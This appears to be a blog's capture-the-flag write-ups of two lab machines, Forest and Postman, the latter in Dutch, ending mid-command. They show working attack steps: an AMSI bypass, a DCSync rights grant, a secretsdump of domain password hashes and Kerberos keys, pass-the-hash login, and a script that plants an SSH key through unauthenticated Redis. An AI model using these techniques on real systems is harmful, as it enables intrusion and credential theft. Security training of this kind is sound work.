[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc

….

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user puck abc123! /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" puck /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" puck /add


The command completed successfully.

.

 

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1


Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu

,. ( . ) " ,. ( . ) . 
(" ( ) )' ,' ( ' (" ) )' ,' . ,) 
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( 
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') 
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ 
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ 
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/

By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-DomainGroupMember 
[+] Add-DomainObjectAcl 
[+] Add-RemoteConnection 
[+] Add-Win32Type 
[+] Convert-ADName 
[+] Convert-DNSRecord 
[+] ConvertFrom-LDAPLogonHours 
[+] ConvertFrom-SID 
[+] ConvertFrom-UACValue 
[+] Convert-LDAPProperty 
[+] ConvertTo-SID 
[+] Dll-Loader 
[+] Donut-Loader 
[+] Export-PowerViewCSV 
[+] field 
[+] Find-DomainLocalGroupMember 
[+] Find-DomainObjectPropertyOutlier 
[+] Find-DomainProcess 
[+] Find-DomainShare 
[+] Find-DomainUserEvent 
[+] Find-DomainUserLocation 
[+] Find-InterestingDomainAcl 
[+] Find-InterestingDomainShareFile 
[+] Find-InterestingFile 
[+] Find-LocalAdminAccess 
[+] func 
[+] Get-Domain 
[+] Get-DomainComputer 
[+] Get-DomainController 
[+] Get-DomainDFSShare 
[+] Get-DomainDNSRecord 
[+] Get-DomainDNSZone 
[+] Get-DomainFileServer 
[+] Get-DomainForeignGroupMember 
[+] Get-DomainForeignUser 
[+] Get-DomainGPO 
[+] Get-DomainGPOComputerLocalGroupMapping 
[+] Get-DomainGPOLocalGroup 
[+] Get-DomainGPOUserLocalGroupMapping 
[+] Get-DomainGroup 
[+] Get-DomainGroupMember 
[+] Get-DomainGroupMemberDeleted 
[+] Get-DomainGUIDMap 
[+] Get-DomainManagedSecurityGroup 
[+] Get-DomainObject 
[+] Get-DomainObjectAcl 
[+] Get-DomainObjectAttributeHistory 
[+] Get-DomainObjectLinkedAttributeHistory 
[+] Get-DomainOU 
[+] Get-DomainPolicyData 
[+] Get-DomainSearcher 
[+] Get-DomainSID 
[+] Get-DomainSite 
[+] Get-DomainSPNTicket 
[+] Get-DomainSubnet 
[+] Get-DomainTrust 
[+] Get-DomainTrustMapping 
[+] Get-DomainUser 
[+] Get-DomainUserEvent 
[+] Get-Forest 
[+] Get-ForestDomain 
[+] Get-ForestGlobalCatalog 
[+] Get-ForestSchemaClass 
[+] Get-ForestTrust 
[+] Get-GPODelegation 
[+] Get-GptTmpl 
[+] Get-GroupsXML 
[+] Get-IniContent 
[+] Get-NetComputerSiteName 
[+] Get-NetLocalGroup 
[+] Get-NetLocalGroupMember 
[+] Get-NetLoggedon 
[+] Get-NetRDPSession 
[+] Get-NetSession 
[+] Get-NetShare 
[+] Get-PathAcl 
[+] Get-PrincipalContext 
[+] Get-RegLoggedOn 
[+] Get-WMIProcess 
[+] Get-WMIRegCachedRDPConnection 
[+] Get-WMIRegLastLoggedOn 
[+] Get-WMIRegMountedDrive 
[+] Get-WMIRegProxy 
[+] Invoke-Binary 
[+] Invoke-Kerberoast 
[+] Invoke-RevertToSelf 
[+] Invoke-UserImpersonation 
[+] New-ADObjectAccessControlEntry 
[+] New-DomainGroup 
[+] New-DomainUser 
[+] New-DynamicParameter 
[+] New-InMemoryModule 
[+] New-ThreadedFunction 
[+] psenum 
[+] Remove-DomainGroupMember 
[+] Remove-DomainObjectAcl 
[+] Remove-RemoteConnection 
[+] Resolve-IPAddress 
[+] Set-DomainObject 
[+] Set-DomainObjectOwner 
[+] Set-DomainUserPassword 
[+] struct 
[+] Test-AdminAccess
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI

Info: Patching 4MSI, please be patient...

[+] Success!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\puck', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity puck -Credential $cred -Rights DCSync

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

.

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $python3 secretsdump.py htb/puck@10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:abc123!
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
puck:9601:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:80999de0dddffb9be58424af7aa12696:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
puck:aes256-cts-hmac-sha1-96:06e262b4631831eb9e36337f221a12ef9002d822111e2cf0b6986677b43de401
puck:aes128-cts-hmac-sha1-96:b36d7c9f29063935479a113ac05ce4f7
puck:des-cbc-md5:d97915c119025dd9
FOREST$:aes256-cts-hmac-sha1-96:667d61b318e1302ef1861f3dfe5f89ef1d737f7f277da9841f64dc6b49de811b
FOREST$:aes128-cts-hmac-sha1-96:2376f9c19c4bb9a61f7008ecb735af41
FOREST$:des-cbc-md5:15bffbfb9dcb2c51
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up... 
┌─[puck@parrot-lt]─[~/htb/forrest]

.

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

 

 

Author: Puckiestyle

HTB-POSTMAN-NL

Postman Write up Hack the box
Postman Write up Hack the box

 

Deze Writeup gaat over Postman, op hack the box. Het was een Linux-box die begint met de exploitatie van Redis om een eerste voet aan de grond te krijgen. Vervolgens inventariseren en vinden we een gecodeerde ssh-sleutel van Matt. Vervolgens kraken we de wachtwoordzin van de ssh-sleutel. We gebruiken dezelfde inloggegevens op de Webmin-instantie die op poort 10000 wordt uitgevoerd. en gebruik Metasploit om root op het systeem te krijgen. Postman was over het algemeen een relatief eenvoudige machine.

Walkthrough

Scanning Network

Ik heb een eerste Nmap-scan gedaan en heb er niet veel op gevonden, alleen ssh en poort 80, wat niet genoeg was. Dus ik deed een volledige poortscan en kreeg deze resultaten van Nmap.

┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $rustscan 10.10.10.160
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

 [~] The config file is expected to be at "/home/puck/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.10.10.160:22 Open 10.10.10.160:80 Open 10.10.10.160:6379 Open 10.10.10.160:10000 [~] Starting Nmap [>] The Nmap command to be run is nmap -vvv -p 22,80,6379,10000 10.10.10.160 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-03 08:06 CEST Initiating Ping Scan at 08:06 Scanning 10.10.10.160 [2 ports] Completed Ping Scan at 08:06, 0.09s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 08:06 Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 08:06 Scanning 10.10.10.160 [4 ports] Discovered open port 22/tcp on 10.10.10.160 Discovered open port 80/tcp on 10.10.10.160 Discovered open port 10000/tcp on 10.10.10.160 Discovered open port 6379/tcp on 10.10.10.160 Completed Connect Scan at 08:06, 0.09s elapsed (4 total ports) Nmap scan report for 10.10.10.160 Host is up, received syn-ack (0.089s latency). Scanned at 2022-06-03 08:06:24 CEST for 0s PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 80/tcp open http syn-ack 6379/tcp open redis syn-ack 10000/tcp open snet-sensor-mgmt syn-ack Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds ┌─[puck@parrot-lt]─[~/htb/postman]


Dus nu heb ik Webmin op 10000, Redis op 6379, SSH en Http. Ik vond een exploit van de ontwikkelaar v an Redis. Blijkbaar zegt hij dat Redis één beveiligingsmodel heeft. Er is geen beveiligingsmodel. Stel het niet bloot aan internet. Bewaar het in een gesloten netwerk en geef alleen toegang aan gebruikers die geautoriseerd zijn om het te gebruiken.

Begrijp hoe de exploit werkt

De exploit werkt omdat Redis iedereen in staat stelt om bestanden op het systeem te schrijven en Redis een ssh-sleutel in de directory heeft en daar schrijfrechten over heeft. Een aanvaller kan overschrijven en we kunnen onze eigen ssh-sleutel schrijven en toegang krijgen tot het systeem als Redis als we deze overschrijven met onze eigen openbare sleutel.

hoewel bij hack the box iedereen probeerde dezelfde exploit te gebruiken, wat het tot een hel maakte om het systeem handmatig te exploiteren. omdat mensen de publieke sleutel als een gek overschreven, dus na 3-4 uur proberen dacht ik dat dit niet zou werken, dus ik automatiseerde het met dit script.

#!/bin/bash
rm /root/.ssh/id*
ssh-keygen -t rsa

(echo -e "\n\n"; cat /home/puck/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

redis-cli -h 10.10.10.160 flushall
cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/
redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save

.

┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $ssh -i /home/puck/.ssh/id_rsa redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$

 

Sla het op als exploit.sh en druk op Enter door en je krijgt toegang als Redis op het systeem. soms is het glitchy en kost het twee of drie keer proberen om de schaal te krijgen. Laten we met ons script klaar zijn voor een shell. Ik heb linEnum.sh uitgevoerd en heb niets gevonden en vervolgens heb ik gekeken naar / gekozen en een gecodeerde ssh-sleutel gevonden.

User verkrijgen op Postman.

redis@Postman:/var$ cd /opt
redis@Postman:/opt$ ls
id_rsa.bak
redis@Postman:/opt$ base64 id_rsa.bak 
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
Sy1JbmZvOiBERVMtRURFMy1DQkMsNzNFOUNFRkJDQ0Y1Mjg3QwoKSmVoQTUxSTE3cnNDT09WcXlX
eCtDODM2M0lPQllYUTExRGR3L3ByM0wyQTJORHRCN3R2c1hOeXFLRGdoZlFuWApjd0dKSlVEOWtL
Sm5pSmtKenJ2RjFXZXB2TU5rajlaSXRYUXpZTjh3Ympscmt1MWJKcTV4bkpYOUVVYjVJN2syCjdH
c1R3c012S3pYa2tmRVpRYVhLL1Q1MHMzSTRDZGNmYnIxZFhJeWFiWExMcFpPaVpFS3ZyNCtLeVNq
cDRvdTYKY2RuQ1doemtBL1R3SnBYRzFXZU9tTXZ0Q1pXMUhDQnV0WXNOUDZCRGY3OGJRR21tbGly
cVJtWGZMQjkySmhUOQoxdThKekhDSjF6Wk1HNXZhVXR2b24wcWdQeDd4ZUlVTzZMQUZUb3pyTjlN
R1dFcUJFSjV6TVZycnQzVEdWa2N2CkV5dmxXd2tzN1IvZ2p4SHlVd1QrYTVMQ0dHU2pWRDg1THhZ
dXRnV3hPVUtidFdHQmJVOHlpN1lzWGxLQ3d3SFAKVUg3T2ZRejAzVld5K0swYWE4UXMrRXl3Nlgz
d2JXbnVlMDNuZy9zTEpuSjcyOXpiM2t1eW04citoVSs5djZWWQpTaitRbmpWVFlqRGZuVDIyakpC
VUhUVjJ5cktlQXo2Q1hkRlQreEloeEVBaXYwbTFaa2t5UWtXcFVpQ3p5dVlLCnQrTVN0d1d0U3Qw
Vko0VTFOYTJHM3hHUGptcmttandYdnVkS0MwWU4vT0JvUFBPVGFCVkQ5aTZmc29aNnB3blMKNU1p
OEJ6ckJoZE8wd0hhRGNUWVBjM0IwMEN3cUFWNU1YbWtBazJ6S0wwVzJ0ZFZZa3NLd3hLQ3dHbVds
cGRrZQpQMkpHbHA5TFdFZXJNZm9sYmpUU09VNW1EZVBmTVEzZndDTzZNUEJpcXpyckZjUE5Kcjcv
TWNRRUNiNXNmK082CmpLRTNKZm4wVVZFMlFWZFZLM29FTDZEeWFCZi9XMmQvM1Q3cTEwVWQ3Sys0
S2QzNmd4TUJmMzNFYTYrcXgzR2UKU2JKSWhrc3c1VEtoZDUwNUFpVUgyVG44OXFOR2VjVkpFYmpL
ZUovdkZaQzVZSXNRKzlzbDg5VG1KSEw3NFkzaQpsM1lYREVzUWpoWkh4WDVYL1JVMDJEK0FGMDdw
M0JTUmpoRDMwY2pqMHV1V2tLb3dwb28wWTBlYmxnbWQ3bzJYCjBWSVdyc2tQSzRJN0lINWdia3J4
VkdiLzlnL1cydWExQzNObmN2M01OY2YwbmxJMTE3QlMvUXdOdHVUb3pHOHAKUzlrM2xpK3JZcjZm
M21hL1VMc1VuS2labHM4U3BVK1JzYW9zTEdLWjZwMm9JZThvUlNtbE9Dc1kwSUNxN2VSUgpoa3V6
VXVIOXovbUJvMnRRV2g4cXZUb0NTRWpnOHlOTzl6OCtMZG9OMXdRV01QYVZ3UkJqSXl4Q1BIRlRK
M3UrClp4eTB0SVB3akNadnhVZlluL0s0RlZIYXZ2QStiOWxvcG5VQ0VBRVJwd0l2OCt0WW9md0dW
cExWQzBEck41OFYKWFRmQjJYOXNMMW9CM2hPNG1KRjBaM3lKMktaRWRZd0hHdXFOVEZhZ04wZ0Jj
eU5JMndzeFpOeklLMjZ2UHJPRApiNkJjOVVkaVdDWnFNS1V4NGFNVExoRzVST2pnUUd5dFdmL3E3
TUdyTzNjRjI1azFQRVdOeVpNcVk0V1lzWlhpCldoUUZIa0ZPSU53VkVPdEhha1ovVG9ZYVVRTnRS
VDZwWnlIZ3ZqVDBtVG8wdDNqVUVSc3BwajFwd2JnZ0NHbWgKS1RrbWhLK01UYW95ODlDZzBYdzJK
MThEbTBvNzhwNlVOcmtTdWUxQ3NXakVmRUlGM05BTUVVMm8rTmdxOTJIbQpucEFGUmV0dndRN3h1
a2swcmJiNm12RjhnU3FMUWc3V3BiWkZ5dGdTMDVUcFBaUE0waDh0UkU4WVJkSmhlV3JRClZjTnla
SDhPSFlxRVM0ZzJVRjYyS3B0dHFTd0xpaUY0dXRIcSsvaDVDUXdzRitKUmc4OGJueGgyejJCRDZp
NVcKWCtoSzVIUHBwNlFualo4QTVFUnVVRUdhWkJFVXZHSnRQR0hqWnlMcGt5dE1oVGphT3JSTll3
PT0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K

Om het over te dragen naar mijn computer om de wachtwoordzin te kraken, baseerde ik de sleutel en vervolgens base64 -d om het terug te decoderen naar een SSH-sleutel en bewaarde het in Matt.key. sleutel.

root@kali:~/Desktop/HackTheBox-Machines/Postman echo -n 